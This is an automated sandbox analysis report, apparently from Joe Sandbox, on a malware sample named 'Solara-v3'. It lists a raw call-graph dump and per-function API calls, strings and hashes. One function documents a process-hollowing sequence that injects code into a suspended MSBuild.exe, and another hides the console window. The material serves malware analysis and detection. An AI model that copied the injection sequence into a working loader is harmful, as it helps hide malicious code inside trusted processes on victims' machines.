ca7f78 29 API calls 2 library calls 20747->20785 20750 ca8f61 20750->20743 20751 ca8f7a 20756 ca8dc7 20751->20756 20755->20751 20757 ca8dfe 20756->20757 20758 ca8dec 20756->20758 20760 caf704 _Fputc 29 API calls 20757->20760 20802 ca8eff 66 API calls _Fputc 20758->20802 20762 ca8e05 20760->20762 20761 ca8df6 20763 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20761->20763 20764 caf704 _Fputc 29 API calls 20762->20764 20768 ca8e2d 20762->20768 20765 ca8efd 20763->20765 20767 ca8e16 20764->20767 20786 ca8fbb LeaveCriticalSection _Ungetc 20765->20786 20766 ca8ee3 20803 ca8eff 66 API calls _Fputc 20766->20803 20767->20768 20769 caf704 _Fputc 29 API calls 20767->20769 20768->20766 20770 caf704 _Fputc 29 API calls 20768->20770 20772 ca8e22 20769->20772 20773 ca8e60 20770->20773 20774 caf704 _Fputc 29 API calls 20772->20774 20775 ca8e83 20773->20775 20777 caf704 _Fputc 29 API calls 20773->20777 20774->20768 20775->20766 20776 ca8e9b 20775->20776 20787 caf430 20776->20787 20779 ca8e6c 20777->20779 20779->20775 20781 caf704 _Fputc 29 API calls 20779->20781 20780 ca8ead 20780->20761 20797 ca8c30 20780->20797 20782 ca8e78 20781->20782 20783 caf704 _Fputc 29 API calls 20782->20783 20783->20775 20785->20750 20786->20750 20788 caf445 20787->20788 20789 caf486 20788->20789 20795 caf449 __fread_nolock _Fputc 20788->20795 20796 caf472 __fread_nolock 20788->20796 20804 ca3790 39 API calls _Fputc 20788->20804 20789->20795 20789->20796 20805 cac021 WideCharToMultiByte _Fputc 20789->20805 20793 caf541 20794 caf557 GetLastError 20793->20794 20793->20795 20794->20795 20794->20796 20795->20780 20796->20795 20806 ca7f78 29 API calls 2 library calls 20796->20806 20798 ca8c3e 20797->20798 20799 ca8c4f 20797->20799 20807 cb4a37 20798->20807 20799->20780 20801 ca8c4a 20801->20780 20802->20761 20803->20761 20804->20789 20805->20793 20806->20795 20808 cb4ad2 20807->20808 20809 caf704 _Fputc 29 API calls 20808->20809 20811 cb4adf 20809->20811 20810 cb4aeb 20810->20801 20811->20810 20812 cb4b37 20811->20812 20831 cb4a4d 31 API calls __fread_nolock 20811->20831 20812->20810 20814 cb4b99 20812->20814 20815 cae736 _Fputc 29 API calls 20812->20815 20820 cb4cc2 20814->20820 20817 cb4b8c 20815->20817 20817->20814 20832 cb669f 14 API calls 2 library calls 20817->20832 20821 caf704 _Fputc 29 API calls 20820->20821 20822 cb4cd1 20821->20822 20823 cb4d77 20822->20823 20824 cb4ce4 20822->20824 20825 cb3e10 _Fputc 64 API calls 20823->20825 20826 cb4d01 20824->20826 20829 cb4d28 20824->20829 20828 cb4baa 20825->20828 20827 cb3e10 _Fputc 64 API calls 20826->20827 20827->20828 20828->20801 20829->20828 20833 cb2922 33 API calls _Fputc 20829->20833 20831->20812 20832->20814 20833->20828 20835 ca951c 20834->20835 20840 ca9544 20834->20840 20836 ca954b 20835->20836 20837 ca9529 20835->20837 20835->20840 20842 ca95d1 20836->20842 20850 ca7f78 29 API calls 2 library calls 20837->20850 20840->20739 20843 ca95dd ___scrt_is_nonwritable_in_current_image 20842->20843 20851 ca3315 EnterCriticalSection 20843->20851 20845 ca95eb 20852 ca9585 20845->20852 20849 ca9583 20849->20739 20850->20840 20851->20845 20853 cae68b 30 API calls 20852->20853 20854 ca959d 20853->20854 20860 ca9367 20854->20860 20857 cae774 64 API calls 20858 ca95c7 20857->20858 20859 ca9620 LeaveCriticalSection _Ungetc 20858->20859 20859->20849 20861 ca93a2 20860->20861 20863 ca9379 20860->20863 20861->20857 20862 ca9387 20870 ca7f78 29 API calls 2 library calls 20862->20870 20863->20861 20863->20862 20865 ca93bd _Yarn 20863->20865 20865->20861 20866 cb4a37 _Fputc 66 API calls 20865->20866 20867 ca85b8 ___scrt_uninitialize_crt 64 API calls 20865->20867 20868 caf704 _Fputc 29 API calls 20865->20868 20869 cb3e10 _Fputc 64 API calls 20865->20869 20866->20865 20867->20865 20868->20865 20869->20865 20870->20861 20871->20705 20872->20703 20873->20703 20874->20703 20876 c94b4f 20875->20876 20878 c92c50 39 API calls 20876->20878 20879 c94b6f 20876->20879 20878->20879 20881 c94c3e 20879->20881 20886 c92f00 38 API calls std::ios_base::_Init 20879->20886 20887 c932c0 30 API calls 5 library calls 20879->20887 20888 ca060c RaiseException 20879->20888 20882 c91de4 20881->20882 20885 c938e0 39 API calls 2 library calls 20881->20885 20882->20480 20885->20882 20886->20879 20887->20879 20888->20879 20889 c998f0 20890 c998f9 20889->20890 20891 c9990f 20889->20891 20896 c92270 GetModuleHandleA GetModuleFileNameW 20890->20896 20903 c9b57d RaiseException Concurrency::cancel_current_task CallUnexpected 20891->20903 20904 caa89a 20896->20904 20898 c922b0 20908 c91fb0 GetPEB 20898->20908 20901 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20902 c922ca 20901->20902 20905 caa8ad _Fputc 20904->20905 20931 caa90f 20905->20931 20907 caa8bf _Fputc 20907->20898 20962 c91240 20908->20962 20912 c92225 20912->20901 20913 c92041 GetFileSize 20914 c921fc CloseHandle 20913->20914 20915 c92055 20913->20915 20914->20912 20916 c9205d ReadFile 20915->20916 20917 c92079 CloseHandle 20916->20917 20918 c921f3 20916->20918 20919 c92205 20917->20919 20930 c92090 _Yarn _Deallocate _strlen 20917->20930 20918->20914 20974 c91ef0 20919->20974 20921 c9223b 20993 c92600 30 API calls std::_Throw_Cpp_error 20921->20993 20923 c92247 20994 ca7ddf 29 API calls 2 library calls 20923->20994 20925 c9a663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20925->20930 20930->20919 20930->20921 20930->20923 20930->20925 20987 c91000 20930->20987 20932 caa93f 20931->20932 20933 caa94e 20932->20933 20935 caa96c 20932->20935 20952 caa943 20932->20952 20955 ca7f78 29 API calls 2 library calls 20933->20955 20944 caa979 20935->20944 20956 ca3790 39 API calls _Fputc 20935->20956 20936 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20943 caabb4 20936->20943 20938 caa993 20957 cb66fb 5 API calls 3 library calls 20938->20957 20939 caa9b1 20941 caab41 20939->20941 20942 caa9c5 20939->20942 20941->20952 20961 cac021 WideCharToMultiByte _Fputc 20941->20961 20946 caaa5f 20942->20946 20950 caaa09 20942->20950 20942->20952 20943->20907 20944->20938 20944->20939 20959 cac021 WideCharToMultiByte _Fputc 20946->20959 20949 caaa72 20951 caaa8b GetLastError 20949->20951 20949->20952 20958 cac021 WideCharToMultiByte _Fputc 20950->20958 20951->20952 20954 caaa9a 20951->20954 20952->20936 20954->20952 20960 cac021 WideCharToMultiByte _Fputc 20954->20960 20955->20952 20956->20944 20957->20952 20958->20952 20959->20949 20960->20954 20961->20952 20963 c91283 _Yarn _Deallocate _strlen 20962->20963 20973 c91402 CreateFileA 20962->20973 20964 c91422 20963->20964 20966 c9142e 20963->20966 20967 c9a663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20963->20967 20971 c91000 102 API calls 20963->20971 20963->20973 20995 c92600 30 API calls std::_Throw_Cpp_error 20964->20995 20996 ca7ddf 29 API calls 2 library calls 20966->20996 20967->20963 20971->20963 20973->20912 20973->20913 20975 c91240 102 API calls 20974->20975 20976 c91f18 FreeConsole 20975->20976 20997 c914b0 20976->20997 20978 c91f39 20979 c914b0 103 API calls 20978->20979 20980 c91f4a 20979->20980 20981 c91240 102 API calls 20980->20981 20982 c91f5d VirtualProtect 20981->20982 20984 c91f7e 20982->20984 20985 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20984->20985 20986 c91fa3 20985->20986 20986->20912 20988 c91013 20987->20988 21008 c92750 20988->21008 21001 c914f0 20997->21001 20998 c94320 30 API calls 20998->21001 20999 c91750 103 API calls 20999->21001 21000 c91d10 75 API calls 21000->21001 21001->20998 21001->20999 21001->21000 21002 c916dd 21001->21002 21003 c91702 _Deallocate 21001->21003 21002->21003 21007 ca7ddf 29 API calls 2 library calls 21002->21007 21003->20978 21009 c927ae 21008->21009 21010 c92c50 39 API calls 21009->21010 21012 c927fa 21009->21012 21018 c927d1 21009->21018 21010->21012 21012->21018 21028 c9cfb0 21012->21028 21013 c929de 21014 c91028 21013->21014 21032 c938e0 39 API calls 2 library calls 21013->21032 21020 c91110 21014->21020 21018->21013 21033 c92f00 38 API calls std::ios_base::_Init 21018->21033 21034 c932c0 30 API calls 5 library calls 21018->21034 21035 ca060c RaiseException 21018->21035 21021 c9115c 21020->21021 21036 c93c70 21021->21036 21025 c92c50 39 API calls 21026 c91031 21025->21026 21026->20930 21029 c9cfbf 21028->21029 21030 c9cfd2 _Yarn 21028->21030 21029->21018 21030->21029 21031 ca932d 69 API calls 21030->21031 21031->21029 21032->21014 21033->21018 21034->21018 21035->21018 21037 c9a9f4 std::_Lockit::_Lockit 7 API calls 21036->21037 21038 c93caa 21037->21038 21039 c9a9f4 std::_Lockit::_Lockit 7 API calls 21038->21039 21041 c93ce5 21038->21041 21040 c93cc4 21039->21040 21043 c9aa25 std::_Lockit::~_Lockit 2 API calls 21040->21043 21044 c9a663 std::ios_base::_Init 3 API calls 21041->21044 21054 c93daf 21041->21054 21042 c9aa25 std::_Lockit::~_Lockit 2 API calls 21045 c91170 21042->21045 21043->21041 21046 c93d4a 21044->21046 21055 c93a00 21045->21055 21069 c93e90 67 API calls 4 library calls 21046->21069 21048 c93d7c 21070 c9ecbf 39 API calls __Getctype 21048->21070 21050 c93d97 21071 c94010 65 API calls 3 library calls 21050->21071 21052 c93da2 21072 c9ab43 RaiseException _Yarn Concurrency::cancel_current_task 21052->21072 21054->21042 21056 c93a3f 21055->21056 21058 c92c50 39 API calls 21056->21058 21059 c93a85 21056->21059 21060 c93a5f 21056->21060 21058->21059 21059->21060 21073 c9cb40 21059->21073 21082 c9cb32 21059->21082 21095 c9cb22 21059->21095 21062 c93b2d 21060->21062 21107 c92f00 38 API calls std::ios_base::_Init 21060->21107 21108 c932c0 30 API calls 5 library calls 21060->21108 21109 ca060c RaiseException 21060->21109 21063 c911e4 21062->21063 21106 c938e0 39 API calls 2 library calls 21062->21106 21063->21025 21069->21048 21070->21050 21071->21052 21072->21054 21077 c9cb63 21073->21077 21078 c9cb5c 21073->21078 21074 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21075 c9cc48 21074->21075 21075->21060 21077->21078 21079 c9cc09 21077->21079 21080 c9cba9 21077->21080 21078->21074 21079->21078 21081 ca932d 69 API calls 21079->21081 21080->21078 21110 c9c44d 21080->21110 21081->21078 21083 c9cb39 21082->21083 21087 c9cb85 21082->21087 21137 ca3329 LeaveCriticalSection 21083->21137 21084 c9cb10 21084->21060 21086 c9cb3e 21086->21060 21087->21060 21087->21084 21088 c9cc09 21087->21088 21089 c9cbea 21087->21089 21090 c9cbfb 21088->21090 21091 ca932d 69 API calls 21088->21091 21089->21090 21093 c9c44d _Fputc 68 API calls 21089->21093 21092 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21090->21092 21091->21090 21094 c9cc48 21092->21094 21093->21090 21094->21060 21096 c9cb29 21095->21096 21102 c9cb2e 21095->21102 21138 ca3315 EnterCriticalSection 21096->21138 21098 c9cb79 21099 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21098->21099 21100 c9cc48 21099->21100 21100->21060 21101 c9c44d _Fputc 68 API calls 21101->21098 21102->21060 21102->21098 21103 c9cc09 21102->21103 21104 c9cba9 21102->21104 21103->21098 21105 ca932d 69 API calls 21103->21105 21104->21098 21104->21101 21105->21098 21106->21063 21107->21060 21108->21060 21109->21060 21113 ca8bfc 21110->21113 21112 c9c45d 21112->21078 21114 ca8c0f _Fputc 21113->21114 21117 ca8c5d 21114->21117 21116 ca8c1e _Fputc 21116->21112 21118 ca8c69 ___scrt_is_nonwritable_in_current_image 21117->21118 21119 ca8c72 21118->21119 21120 ca8c96 21118->21120 21134 ca7f78 29 API calls 2 library calls 21119->21134 21133 ca3315 EnterCriticalSection 21120->21133 21123 ca8c8b _Fputc 21123->21116 21124 ca8c9f 21125 caf704 _Fputc 29 API calls 21124->21125 21132 ca8cb4 21124->21132 21125->21132 21126 ca8d20 21135 ca7f78 29 API calls 2 library calls 21126->21135 21127 ca8d51 21128 ca8c30 _Fputc 66 API calls 21127->21128 21130 ca8d5d 21128->21130 21136 ca8d89 LeaveCriticalSection _Ungetc 21130->21136 21132->21126 21132->21127 21133->21124 21134->21123 21135->21123 21136->21123 21137->21086 21138->21102 21139 c9b060 21162 c9afc4 GetModuleHandleExW 21139->21162 21142 c9b0a6 21144 c9afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21142->21144 21146 c9b0ac 21144->21146 21145 c9b09a 21171 c9efd2 21145->21171 21148 c9b0cd 21146->21148 21174 c9afa7 GetModuleHandleExW 21146->21174 21164 c97770 21148->21164 21150 c9b0bd 21150->21148 21151 c9b0c3 FreeLibraryWhenCallbackReturns 21150->21151 21151->21148 21152 c9b0dd 21153 c9afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21152->21153 21154 c9b0e3 21153->21154 21160 c9b111 21154->21160 21175 c9aefa 37 API calls std::_Throw_Cpp_error 21154->21175 21156 c9b0ef 21157 c9efd2 ReleaseSRWLockExclusive 21156->21157 21158 c9b102 21157->21158 21158->21160 21176 c9e95d WakeAllConditionVariable 21158->21176 21163 c9afda 21162->21163 21163->21142 21170 c9aefa 37 API calls std::_Throw_Cpp_error 21163->21170 21165 c977af 21164->21165 21177 c98aa0 21165->21177 21166 c977b9 21182 c9af64 CloseThreadpoolWork 21166->21182 21168 c977cb 21168->21152 21170->21145 21172 c9efed 21171->21172 21173 c9efdf ReleaseSRWLockExclusive 21171->21173 21172->21142 21173->21172 21174->21150 21175->21156 21176->21160 21178 c98add 21177->21178 21179 c98ae8 21178->21179 21183 c990e0 21178->21183 21200 c990f0 21178->21200 21179->21166 21182->21168 21184 c990ea 21183->21184 21216 c9efc1 21184->21216 21187 c991c7 21226 c9b317 30 API calls 2 library calls 21187->21226 21188 c99136 21189 c991ce 21188->21189 21190 c99143 21188->21190 21227 c9b317 30 API calls 2 library calls 21189->21227 21192 c9914b 21190->21192 21193 c99174 21190->21193 21196 c9efd2 ReleaseSRWLockExclusive 21192->21196 21195 c9efd2 ReleaseSRWLockExclusive 21193->21195 21197 c99181 21195->21197 21198 c99151 std::_Throw_Cpp_error 21196->21198 21219 c992f0 21197->21219 21198->21179 21201 c9efc1 12 API calls 21200->21201 21202 c9912b 21201->21202 21203 c991c7 21202->21203 21204 c99136 21202->21204 21255 c9b317 30 API calls 2 library calls 21203->21255 21205 c991ce 21204->21205 21206 c99143 21204->21206 21256 c9b317 30 API calls 2 library calls 21205->21256 21208 c9914b 21206->21208 21209 c99174 21206->21209 21212 c9efd2 ReleaseSRWLockExclusive 21208->21212 21211 c9efd2 ReleaseSRWLockExclusive 21209->21211 21213 c99181 21211->21213 21214 c99151 std::_Throw_Cpp_error 21212->21214 21215 c992f0 66 API calls 21213->21215 21214->21179 21215->21214 21228 c9eff1 GetCurrentThreadId 21216->21228 21244 c99620 21219->21244 21223 c9939f 21253 c99400 66 API calls std::_Throw_Cpp_error 21223->21253 21225 c993ae 21225->21198 21229 c9f01b 21228->21229 21230 c9f03a 21228->21230 21231 c9f020 AcquireSRWLockExclusive 21229->21231 21239 c9f030 21229->21239 21232 c9f05a 21230->21232 21233 c9f043 21230->21233 21231->21239 21235 c9f0b9 21232->21235 21241 c9f072 21232->21241 21234 c9f04e AcquireSRWLockExclusive 21233->21234 21233->21239 21234->21239 21236 c9f0c0 TryAcquireSRWLockExclusive 21235->21236 21235->21239 21236->21239 21237 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21238 c9912b 21237->21238 21238->21187 21238->21188 21239->21237 21241->21239 21242 c9f0a9 TryAcquireSRWLockExclusive 21241->21242 21243 c9fdcd GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 21241->21243 21242->21239 21242->21241 21243->21241 21245 c99667 21244->21245 21246 c9a663 std::ios_base::_Init 3 API calls 21245->21246 21247 c9935f 21246->21247 21248 c994f0 21247->21248 21249 c99536 std::_Throw_Cpp_error 21248->21249 21252 c99540 std::_Throw_Cpp_error 21249->21252 21254 c9b57d RaiseException Concurrency::cancel_current_task CallUnexpected 21249->21254 21252->21223 21253->21225 21257 ca92d7 21258 cabed7 ___free_lconv_mon 14 API calls 21257->21258 21259 ca92ef 21258->21259

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00CCA19E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00CCA110,00CCA100), ref: 00CCA334
                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00CCA347
                                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(0000011C,00000000), ref: 00CCA365
                                                                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(0000009C,?,00CCA154,00000004,00000000), ref: 00CCA389
                                                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00CCA3B4
                                                                                                                                                                                                                                              • TerminateProcess.KERNELBASE(0000009C,00000000), ref: 00CCA3D3
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00CCA40C
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00CCA457
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00CCA495
                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(0000011C,04F30000), ref: 00CCA4D1
                                                                                                                                                                                                                                              • ResumeThread.KERNELBASE(0000011C), ref: 00CCA4E0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                              • API String ID: 2440066154-3857624555
                                                                                                                                                                                                                                              • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                              • Instruction ID: 2517bcaad138f5626ff6b2e1a3613d2b94862d4e6f8cedcdb9679be5979ea805
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8B1F87660064AAFDB60CF68CC80BDA73A5FF88714F158158EA1CAB341D774FA51CB94
                                                                                                                                                                                                                                              Function 00C91FB0 Relevance: 9.2, APIs: 6, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C91240: _strlen.LIBCMT ref: 00C912BA
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE ref: 00C92036
                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00C92046
                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00C9206B
                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00C9207A
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00C920CD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C921FD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2911764282-0
                                                                                                                                                                                                                                              • Opcode ID: 15cf3c8d83c8c39a360d0292e7e00b11535b4b82b9b8ad1bbe65d2e346971d45
                                                                                                                                                                                                                                              • Instruction ID: 9ca4b8d43c567d61fb7b0063a99f1d38f30d60443d61300d43a8c35dc18fe07c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15cf3c8d83c8c39a360d0292e7e00b11535b4b82b9b8ad1bbe65d2e346971d45
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E971D3B2C002199BCF10DFA4DC49BAEBBB5FF48324F140629E854B7391E7319A55DBA1
                                                                                                                                                                                                                                              Function 00C91000 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 75a05097f707e5fe1a29ae825962998c4151c759332a6706fb0744709a00d183
                                                                                                                                                                                                                                              • Instruction ID: d7ea9445a130c15bcdc44eb79e625b9dc650a26df34266af1a6dddbac7d57c16
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a05097f707e5fe1a29ae825962998c4151c759332a6706fb0744709a00d183
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6213C336141660B8F5C9F386D67037FB4ADB875A0749673ADD239F2D1E521DE1082E4
                                                                                                                                                                                                                                              Function 00C924B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleWindow.KERNELBASE ref: 00C924DD
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00C924E6
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C92524
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00C9253A,?,?,00000000), ref: 00C9F129
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00C9253A,?,?,00000000), ref: 00C9F142
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: CloseHandle.KERNEL32(?,?,?,00C9253A,?,?,00000000), ref: 00C9F154
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92567
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92578
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92589
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C9259A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3956949563-0
                                                                                                                                                                                                                                              • Opcode ID: f0dab722603f7f490684830244e17ffe6a5ca9464f16dd55408b1a6e103aa45d
